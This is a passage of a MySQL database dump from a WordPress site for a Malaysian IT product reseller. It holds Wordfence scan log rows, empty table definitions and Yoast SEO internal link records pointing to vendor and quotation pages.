Firewall status'),(23780,1571971176.032764,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(23781,1571971176.244041,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(23000,1569946307.850690,2,'info','Starting DNS scan for bintara.com.my'),(23645,1571502914.428212,2,'info','500 files indexed'),(23204,1570205992.622973,2,'info','32519 files indexed'),(23199,1570205970.607822,2,'info','30181 files indexed'),(23200,1570205972.728070,2,'info','30681 files indexed'),(23201,1570205975.031171,2,'info','31019 files indexed'),(23202,1570205989.585814,2,'info','31519 files indexed'),(23203,1570205990.773759,2,'info','32019 files indexed'),(23196,1570205967.425953,2,'info','28681 files indexed'),(23197,1570205968.332663,2,'info','29181 files indexed'),(23198,1570205969.371238,2,'info','29681 files indexed'),(23647,1571502922.097027,2,'info','1102 files indexed'),(23646,1571502915.012253,2,'info','602 files indexed'),(22689,1569032963.268246,1,'info','-------------------'),(22690,1569032963.291652,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20.75 MB'),(23325,1570588510.192353,1,'info','-------------------'),(22977,1569810321.512164,1,'info','-------------------'),(22978,1569810321.513758,2,'info','Wordfence used 768 KB of memory for scan. Server peak memory usage was: 47 MB'),(22979,1569810321.514285,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23594,1571365635.844006,1,'info','-------------------'),(22679,1568946389.224224,1,'info','-------------------'),(22680,1568946389.225485,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 21 MB'),(22681,1568946389.225871,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23597,1571365635.877445,10,'info','SUM_FINAL:Scan complete. You have 20 new issues to fix. See below.'),(22982,1569896719.184802,1,'info','Initiating quick scan'),(22684,1569032962.959699,1,'info','Initiating quick scan'),(23596,1571365635.846492,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(23595,1571365635.845862,2,'info','Wordfence used 512 KB of memory for scan. Server peak memory usage was: 46.75 MB'),(23276,1570464852.812518,2,'info','4593 files indexed'),(23277,1570464868.197154,2,'info','5093 files indexed'),(23278,1570464868.504933,2,'info','5593 files indexed'),(23279,1570464868.966905,2,'info','6093 files indexed'),(23280,1570464869.536548,2,'info','6593 files indexed'),(23281,1570464869.943400,2,'info','7093 files indexed'),(23282,1570464870.108932,2,'info','7593 files indexed'),(23283,1570464870.305826,2,'info','8093 files indexed'),(23284,1570464870.764100,2,'info','8593 files indexed'),(23285,1570464871.252829,2,'info','9093 files indexed'),(22926,1569688673.927882,2,'info','500 files indexed'),(22927,1569688676.542672,2,'info','1000 files indexed'),(22928,1569688676.839848,2,'info','1500 files indexed'),(22929,1569688677.427720,2,'info','2000 files indexed'),(22930,1569688677.971546,2,'info','2500 files indexed'),(22931,1569688678.002430,2,'info','2530 files indexed'),(22932,1569688686.489922,2,'info','3030 files indexed'),(22933,1569688686.825266,2,'info','3530 files indexed'),(22934,1569688687.288961,2,'info','4030 files indexed'),(22935,1569688698.941434,2,'info','4530 files indexed'),(22936,1569688701.007092,2,'info','4536 files indexed'),(22480,1568909507.218701,1,'info','Scheduled Wordfence scan starting at Friday 20th of September 2019 12:11:47 AM'),(22939,1569688764.889347,2,'info','6036 files indexed'),(22482,1568909512.046267,1,'info','Contacting Wordfence to initiate scan'),(22937,1569688763.690728,2,'info','5036 files indexed'),(22938,1569688763.824902,2,'info','5536 files indexed'),(23697,1571760759.695124,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(23696,1571760759.692341,10,'info','SUM_START:Checking for future GeoIP support'),(23695,1571760759.683099,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(23621,1571502911.351063,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(23622,1571502911.358680,10,'info','SUM_START:Scanning to check available disk space'),(23241,1570464819.731830,2,'info','Scanning DNS MX record for bintara.com.my'),(22821,1569428000.841567,2,'info','Starting DNS scan for bintara.com.my'),(22822,1569428001.406933,2,'info','Scanning DNS A record for bintara.com.my'),(22823,1569428001.598004,2,'info','Scanning DNS MX record for bintara.com.my'),(22824,1569428001.598978,2,'info','Scanning DNS MX record for bintara.com.my'),(23240,1570464819.730675,2,'info','Scanning DNS MX record for bintara.com.my'),(23239,1570464819.543736,2,'info','Scanning DNS A record for bintara.com.my'),(22827,1569428001.615446,2,'info','Total disk space: 498.06 GB -- Free disk space: 142.99 GB'),(22828,1569428001.615894,2,'info','The disk has 146419.58 MB available'),(23238,1570464819.140516,2,'info','Starting DNS scan for bintara.com.my'),(23623,1571502911.361704,2,'info','Total disk space: 498.06 GB -- Free disk space: 132.22 GB'),(23624,1571502911.362093,2,'info','The disk has 135393.54 MB available'),(22415,1568650579.581153,2,'info','Scanned contents of 194 additional files at 5.75 per second'),(22416,1568650579.978521,2,'info','Scanned contents of 199 additional files at 5.83 per second'),(22417,1568650579.979921,2,'info','Asking Wordfence to check URLs against malware list.'),(22418,1568650580.027065,2,'info','Checking 6994 host keys against Wordfence scanning servers.'),(22419,1568650614.738196,2,'info','Done host key check.'),(22420,1568650614.744674,2,'info','Checking 4 URLs from 3 sources.'),(22421,1568650615.499891,2,'info','Done URL check.'),(22422,1568650619.510135,2,'info','Done file contents scan'),(23777,1571971175.994496,1,'info','Initiating quick scan'),(23225,1570416178.329189,1,'info','-------------------'),(23226,1570416178.330301,2,'info','Wordfence used 1 MB of memory for scan. Server peak memory usage was: 47 MB'),(23227,1570416178.330636,1,'info','Quick Scan Complete. Scanned in 1 second.'),(23630,1571502911.638172,2,'info','Getting plugin list from WordPress'),(23631,1571502911.679341,2,'info','Found 34 plugins'),(23229,1570464805.245711,1,'info','Scheduled Wordfence scan starting at Tuesday 8th of October 2019 12:13:25 AM'),(22428,1568650619.808839,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(22429,1568650619.810053,2,'info','Checking 128 host keys against Wordfence scanning servers.'),(22430,1568650620.544483,2,'info','Done host key check.'),(22431,1568650620.545202,2,'info','Done examining URLs'),(23231,1570464812.031309,1,'info','Contacting Wordfence to initiate scan'),(23628,1571502911.380755,10,'info','SUM_START:Checking for future GeoIP support'),(23629,1571502911.383705,10,'info','SUM_ENDOK:Checking for future GeoIP support'),(22436,1568650620.577287,2,'info','Starting password strength check on 2 users.'),(23627,1571502911.372574,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(22837,1569428002.157965,2,'info','Found 1 themes'),(23626,1571502911.369581,10,'info','SUM_START:Checking Web Application Firewall status'),(22836,1569428002.150453,2,'info','Getting theme list from WordPress'),(22834,1569428002.105788,2,'info','Getting plugin list from WordPress'),(22835,1569428002.149977,2,'info','Found 33 plugins'),(22443,1568650628.014463,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(22444,1568650628.015302,2,'info','Done examining URLs'),(23625,1571502911.362385,10,'info','SUM_ENDOK:Scanning to check available disk space'),(22446,1568650628.022772,1,'info','-------------------'),(22447,1568650628.023421,2,'info','Wordfence used 43.5 MB of memory for scan. Server peak memory usage was: 64.25 MB'),(22448,1568650628.023925,1,'info','Scan Complete. Scanned 2282 files, 22 plugins, 1 themes, 125 posts, 0 comments and 2412 URLs in 5 minutes 13 seconds.'),(23703,1571760762.358192,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(23698,1571760759.785873,2,'info','Getting plugin list from WordPress'),(23699,1571760759.830266,2,'info','Found 34 plugins'),(23700,1571760759.830939,2,'info','Getting theme list from WordPress'),(23701,1571760759.839133,2,'info','Found 1 themes'),(23702,1571760759.845488,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(23687,1571760759.640122,2,'info','Scanning DNS MX record for bintara.com.my'),(23688,1571760759.641131,2,'info','Scanning DNS MX record for bintara.com.my'),(23689,1571760759.642836,10,'info','SUM_ENDOK:Scanning DNS for unauthorized changes'),(22492,1568909519.332592,2,'info','Scanning DNS MX record for bintara.com.my'),(22489,1568909519.095797,2,'info','Starting DNS scan for bintara.com.my'),(22490,1568909519.314546,2,'info','Scanning DNS A record for bintara.com.my'),(22491,1568909519.331179,2,'info','Scanning DNS MX record for bintara.com.my');
/*!40000 ALTER TABLE `wpdp_wfstatus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wftrafficrates`
--

DROP TABLE IF EXISTS `wpdp_wftrafficrates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wftrafficrates` (
  `eMin` int(10) unsigned NOT NULL,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `hitType` enum('hit','404') NOT NULL DEFAULT 'hit',
  `hits` int(10) unsigned NOT NULL,
  PRIMARY KEY (`eMin`,`IP`,`hitType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wftrafficrates`
--

LOCK TABLES `wpdp_wftrafficrates` WRITE;
/*!40000 ALTER TABLE `wpdp_wftrafficrates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wftrafficrates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wpfm_backup`
--

DROP TABLE IF EXISTS `wpdp_wpfm_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wpfm_backup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `backup_name` text COLLATE utf8mb4_unicode_ci,
  `backup_date` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wpfm_backup`
--

LOCK TABLES `wpdp_wpfm_backup` WRITE;
/*!40000 ALTER TABLE `wpdp_wpfm_backup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wpfm_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_yoast_seo_links`
--

DROP TABLE IF EXISTS `wpdp_yoast_seo_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_yoast_seo_links` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL,
  `target_post_id` bigint(20) unsigned NOT NULL,
  `type` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `link_direction` (`post_id`,`type`)
) ENGINE=MyISAM AUTO_INCREMENT=16394 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_yoast_seo_links`
--

LOCK TABLES `wpdp_yoast_seo_links` WRITE;
/*!40000 ALTER TABLE `wpdp_yoast_seo_links` DISABLE KEYS */;
INSERT INTO `wpdp_yoast_seo_links` (`id`, `url`, `post_id`, `target_post_id`, `type`) VALUES (4650,'https://bintara.com.my/contact-us/',1436,19,'internal'),(4677,'https://bintara.com.my/contact-us/',1440,19,'internal'),(281,'https://bintara.com.my/wp-admin/profile.php',1690,0,'internal'),(3973,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3972,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3971,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3970,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3969,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3968,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3967,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3966,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3965,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3964,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3963,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3962,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3961,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3960,'https://bintara.com.my/logitech-rally-camera/',16,2885,'internal'),(3959,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3958,'https://bintara.com.my/logitech-ptz-pro-2/',16,2954,'internal'),(3957,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(3956,'https://bintara.com.my/logitech-bcc950/',16,2972,'internal'),(3955,'https://bintara.com.my/get-quotation-logitech/',16,1690,'internal'),(2639,'http://bintara.com.my/logitech',1400,16,'internal'),(2593,'http://bintara.com.my/adobe',1325,1436,'internal'),(4756,'https://bintara.com.my/contact-us/',1443,19,'internal'),(4757,'https://bintara.com.my/contact-us/',1444,19,'internal'),(4661,'https://bintara.com.my/contact-us/',1437,19,'internal'),(2764,'https://bintara.com.my/designjet-large-format-office-printers/',1385,1528,'internal'),(2597,'http://bintara.com.my/aruba',1335,1440,'internal'),(2601,'http://bintara.com.my/atlas.ti',1342,1443,'internal'),(4808,'https://bintara.com.my/anydesk',1328,1437,'internal'),(2592,'http://bintara.com.my/acronis',1324,1435,'internal'),(5280,'https://bintara.com.my/contact-us/',1451,19,'internal'),(2677,'http://bintara.com.my/zebra',1505,1619,'internal'),(7304,'https://bintara.com.my/contact-us/',1450,19,'internal'),(2608,'http://bintara.com.my/cambium',1357,1451,'internal'),(2600,'http://bintara.com.my/asus',1341,1442,'internal'),(2595,'http://bintara.com.my/apc',1329,1438,'internal'),(2602,'http://bintara.com.my/autodesk',1344,1444,'internal'),(2604,'http://bintara.com.my/belkin',1348,1446,'internal'),(2605,'http://bintara.com.my/bitdefender',1353,1448,'internal'),(2609,'http://bintara.com.my/canon',1361,1449,'internal'),(4807,'https://bintara.com.my/cisco',1363,1450,'internal'),(4809,'https://bintara.com.my/coreldraw',1366,1472,'internal'),(7310,'https://bintara.com.my/contact-us/',1472,19,'internal'),(2612,'http://bintara.com.my/d-link',1371,1480,'internal'),(15767,'https://bintara.com.my/dell-emc/',1370,1478,'internal'),(2615,'http://bintara.com.my/dropbox',1375,1473,'internal'),(2616,'http://bintara.com.my/epson',1376,1486,'internal'),(2763,'https://bintara.com.my/contact-us/',1447,19,'internal'),(4820,'https://bintara.com.my/ergotron',1378,1483,'internal'),(2618,'http://bintara.com.my/eset',1379,1477,'internal'),(2619,'http://bintara.com.my/faronics',1380,1484,'internal'),(2620,'http://bintara.com.my/fortinet',1382,1474,'internal'),(2621,'https://bintara.com.my/fujixerox/',1383,1482,'internal'),(2626,'http://bintara.com.my/houdini',1384,1526,'internal'),(2628,'http://bintara.com.my/hpe',1387,1529,'internal'),(2629,'http://bintara.com.my/huawei',1388,1534,'internal'),(2630,'http://bintara.com.my/ibm',1389,1530,'internal'),(2631,'http://bintara.com.my/infocus',1390,1531,'internal'),(2632,'http://bintara.com.my/jabra',1393,1532,'internal'),(2633,'http://bintara.com.my/juniper',1394,1533,'internal'),(4815,'https://bintara.com.my/kaspersky',1395,1543,'internal'),(2635,'http://bintara.com.my/kingston',1396,1544,'internal'),(4811,'https://bintara.com.my/lenovo',1398,1545,'internal'),(4814,'https://bintara.com.my/lg',1399,1546,'internal'),(2641,'http://bintara.com.my/mapinfo',1402,1548,'internal'),(10561,'https://bintara.com.my/contact-us/',1473,19,'internal'),(4810,'https://bintara.com.my/mcafee',1403,1549,'internal'),(2645,'https://bintara.com.my/motorola/',1405,1550,'internal'),(2644,'http://bintara.com.my/microsoft',1407,1551,'internal'),(2647,'https://bintara.com.my/netapp/',1408,1552,'internal'),(4821,'https://bintara.com.my/nitro',1410,1553,'internal'),(2590,'http://bintara.com.my/nuance',1411,1555,'internal'),(2649,'http://bintara.com.my/nutanix',1413,1567,'internal'),(2650,'http://bintara.com.my/nvivo',1415,1568,'internal'),(2651,'https://bintara.com.my/paloalto/',1416,1569,'internal'),(2652,'http://bintara.com.my/panasonic',1417,1570,'internal'),(2653,'https://bintara.com.my/panasonic-toughbook/',1418,1571,'internal'),(2654,'https://bintara.com.my/peplink/',1420,1572,'internal'),(4803,'https://bintara.com.my/qnap/',1427,1576,'internal'),(4802,'https://bintara.com.my/redhat/',1428,1577,'internal'),(4801,'https://bintara.com.my/ruckus/',1429,1578,'internal'),(2661,'https://bintara.com.my/sage/',1431,1579,'internal'),(2663,'https://bintara.com.my/samsung/',1432,1580,'internal'),(2664,'https://bintara.com.my/seagate/',1433,1581,'internal'),(4800,'https://bintara.com.my/solarwinds/',1441,1597,'internal'),(2691,'https://bintara.com.my/contact-us/',1555,19,'internal'),(2665,'https://bintara.com.my/sophos/',1457,1598,'internal'),(2666,'https://bintara.com.my/storagecraft/',1461,1599,'internal'),(2667,'https://bintara.com.my/synology/',1467,1600,'internal'),(2668,'https://bintara.com.my/teamviewer/',1470,1605,'internal'),(2669,'https://bintara.com.my/ubiquiti/',1491,1606,'internal'),(4799,'https://bintara.com.my/veeam/',1492,1608,'internal'),(2671,'https://bintara.com.my/veritas/',1495,1609,'internal'),(2672,'https://bintara.com.my/wacom/',1498,1610,'internal'),(2673,'https://bintara.com.my/watchguard/',1499,1612,'internal'),(2675,'https://bintara.com.my/western-digital/',1501,1617,'internal'),(2676,'https://bintara.com.my/winrar/',1504,1618,'internal'),(327,'https://bintara.com.my/contact-us/',1568,19,'internal'),(2603,'https://bintara.com.my/barracuda/',1345,1445,'internal'),(4002,'https://bintara.com.my/zoom-meetings-chat/',1506,3056,'internal'),(4816,'https://bintara.com.my/gototraining/',1636,1634,'internal'),(4817,'https://bintara.com.my/gotowebinar/',1635,1633,'internal'),(4818,'https://bintara.com.my/gotomeeting/',1631,1632,'internal'),(4762,'https://bintara.com.my/qator-live/',1421,1573,'internal'),(4764,'https://bintara.com.my/qator-investigator/',1425,1574,'internal'),(4763,'https://bintara.com.my/qator-enterprise/',1426,1575,'internal'),(4761,'https://bintara.com.my/broadbase/',1944,1943,'internal'),(172,'https://bintara.com.my/contact-us/',1575,19,'internal'),(175,'https://bintara.com.my/contact-us/',1600,19,'internal'),(332,'https://bintara.com.my/contact-us/',1605,19,'internal'),(292,'https://bintara.com.my/contact-us/',1619,19,'internal'),(14822,'https://bintara.com.my/contact-us/',1633,19,'internal'),(14821,'https://bintara.com.my/contact-us/',1634,19,'internal'),(14808,'https://bintara.com.my/contact-us/',1632,19,'internal'),(4759,'https://bintara.com.my/bluejeans/',2035,2024,'internal'),(2742,'https://bintara.com.my/contact-us/',2024,19,'internal'),(367,'https://bintara.com.my/contact-us/',1567,19,'internal'),(4670,'https://bintara.com.my/contact-us/',1439,19,'internal'),(2598,'https://bintara.com.my/apple/',1333,1439,'internal'),(14827,'https://bintara.com.my/contact-us/',2048,19,'internal'),(4804,'https://bintara.com.my/honeywell/',2073,2048,'internal'),(758,'https://bintara.com.my/contact-us/',1571,19,'internal'),(334,'https://bintara.com.my/contact-us/',1608,19,'internal'),(14838,'https://bintara.com.my/contact-us/',1528,19,'internal'),(4665,'https://bintara.com.my/contact-us/',1438,19,'internal'),(3892,'https://bintara.com.my/get-quotation-logitech/',2885,1690,'internal'),(2938,'https://bintara.com.my/get-quotation-logitech/',2000,1690,'internal'),(284,'https://bintara.com.my/contact-us/',1572,19,'internal'),(296,'https://bintara.com.my/contact-us/',1610,19,'internal'),(4646,'https://bintara.com.my/contact-us/',1435,19,'internal'),(331,'https://bintara.com.my/contact-us/',1573,19,'internal'),(333,'https://bintara.com.my/contact-us/',1606,19,'internal'),(4001,'https://bintara.com.my/contact-us/',3056,19,'internal'),(345,'https://bintara.com.my/contact-us/',1618,19,'internal'),(353,'https://bintara.com.my/contact-us/',1612,19,'internal'),(347,'https://bintara.com.my/contact-us/',1617,19,'internal'),(355,'https://bintara.com.my/contact-us/',1609,19,'internal'),(352,'https://bintara.com.my/contact-us/',1599,19,'internal'),(357,'https://bintara.com.my/contact-us/',1598,19,'internal'),(360,'https://bintara.com.my/contact-us/',1581,19,'internal'),(359,'https://bintara.com.my/contact-us/',1579,19,'internal'),(361,'https://bintara.com.my/contact-us/',1578,19,'internal'),(363,'https://bintara.com.my/contact-us/',1576,19,'internal'),(5259,'https://bintara.com.my/contact-us/',2834,19,'internal'),(5262,'https://bintara.com.my/contact-us/',1448,19,'internal'),(14782,'https://bintara.com.my/contact-us/',1483,19,'internal'),(14785,'https://bintara.com.my/contact-us/',1477,19,'internal'),(395,'https://bintara.com.my/contact-us/',1553,19,'internal'),(399,'https://bintara.com.my/contact-us/',1552,19,'internal'),(405,'https://bintara.com.my/contact-us/',1549,19,'internal'),(514,'https://bintara.com.my/contact-us/',1548,19,'internal'),(408,'https://bintara.com.my/contact-us/',1545,19,'internal'),(412,'https://bintara.com.my/contact-us/',1546,19,'internal'),(411,'https://bintara.com.my/contact-us/',1546,19,'internal'),(413,'https://bintara.com.my/contact-us/',1544,19,'internal'),(14803,'https://bintara.com.my/contact-us/',1474,19,'internal'),(417,'https://bintara.com.my/contact-us/',1543,19,'internal'),(418,'https://bintara.com.my/contact-us/',1533,19,'internal'),(15475,'https://bintara.com.my/contact-us/',1531,19,'internal'),(508,'https://bintara.com.my/contact-us/',1597,19,'internal'),(14830,'https://bintara.com.my/contact-us/',1526,19,'internal'),(14805,'https://bintara.com.my/contact-us/',1482,19,'internal'),(4616,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4615,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4614,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4613,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4612,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4611,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4610,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4609,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4606,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4608,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(15462,'https://bintara.com.my/contact-us/',1529,19,'internal'),(5250,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(14828,'https://bintara.com.my/arcadia/',3506,3606,'internal'),(7296,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7292,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7293,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7294,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7295,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(10544,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10543,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10542,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10541,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(899,'https://bintara.com.my/wp-admin/profile.php',2651,0,'internal'),(10547,'https://bintara.com.my/contact-us/',1478,19,'internal'),(2591,'http://bintara.com.my/acer',1323,1430,'internal'),(499,'https://bintara.com.my/contact-us/',1550,19,'internal'),(15465,'https://bintara.com.my/contact-us/',1534,19,'internal'),(515,'https://bintara.com.my/contact-us/',1580,19,'internal'),(516,'https://bintara.com.my/contact-us/',1580,19,'internal'),(517,'https://bintara.com.my/contact-us/',1580,19,'internal'),(518,'https://bintara.com.my/contact-us/',1580,19,'internal'),(519,'https://bintara.com.my/contact-us/',1580,19,'internal'),(520,'https://bintara.com.my/contact-us/',1580,19,'internal'),(522,'https://bintara.com.my/contact-us/',1569,19,'internal'),(525,'https://bintara.com.my/contact-us/',1577,19,'internal'),(15743,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15744,'https://bintara.com.my/get-quotation-jabra-evolve/',1532,2862,'internal'),(15472,'https://bintara.com.my/contact-us/',1530,19,'internal'),(1084,'https://bintara.com.my/wp-admin/profile.php',2662,0,'internal'),(4753,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4752,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4751,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4750,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4749,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4748,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4747,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4746,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4745,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4744,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4743,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4742,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4740,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(1828,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1827,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1826,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1825,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(759,'https://bintara.com.my/panasonic-toughbook-product/',1571,2580,'internal'),(780,'https://bintara.com.my/wp-admin/profile.php',2619,0,'internal'),(1824,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1823,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1822,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1821,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1820,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1819,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1818,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1817,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(1816,'https://bintara.com.my/get-quotation-panasonic-toughbook/',2580,2619,'internal'),(10540,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10539,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10538,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10537,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10536,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10535,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10534,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10533,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10532,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(10531,'https://bintara.com.my/get-quotation-d-link/',1480,2651,'internal'),(4607,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4605,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4604,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4603,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4602,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(4601,'https://bintara.com.my/get-quotation-acer/',1430,2662,'internal'),(1164,'https://bintara.com.my/wp-admin/profile.php',2671,0,'internal'),(4741,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4739,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4738,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4737,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4736,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(4735,'https://bintara.com.my/get-quotation-asus/',1442,2671,'internal'),(1832,'https://bintara.com.my/wp-admin/profile.php',2696,0,'internal'),(5249,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5248,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5247,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5246,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5245,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5244,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5243,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5242,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5241,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5240,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(5239,'https://bintara.com.my/get-quotation-belkin/',1446,2696,'internal'),(1861,'https://bintara.com.my/wp-admin/profile.php',2703,0,'internal'),(1867,'https://bintara.com.my/get-quotation-broadbase/',1943,2703,'internal'),(7290,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7291,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7289,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7286,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7288,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(2140,'https://bintara.com.my/wp-admin/profile.php',2737,0,'internal'),(7287,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7285,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7284,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7283,'https://bintara.com.my/get-quotation-canon/',1449,2737,'internal'),(7282,'https://bintara.com.my/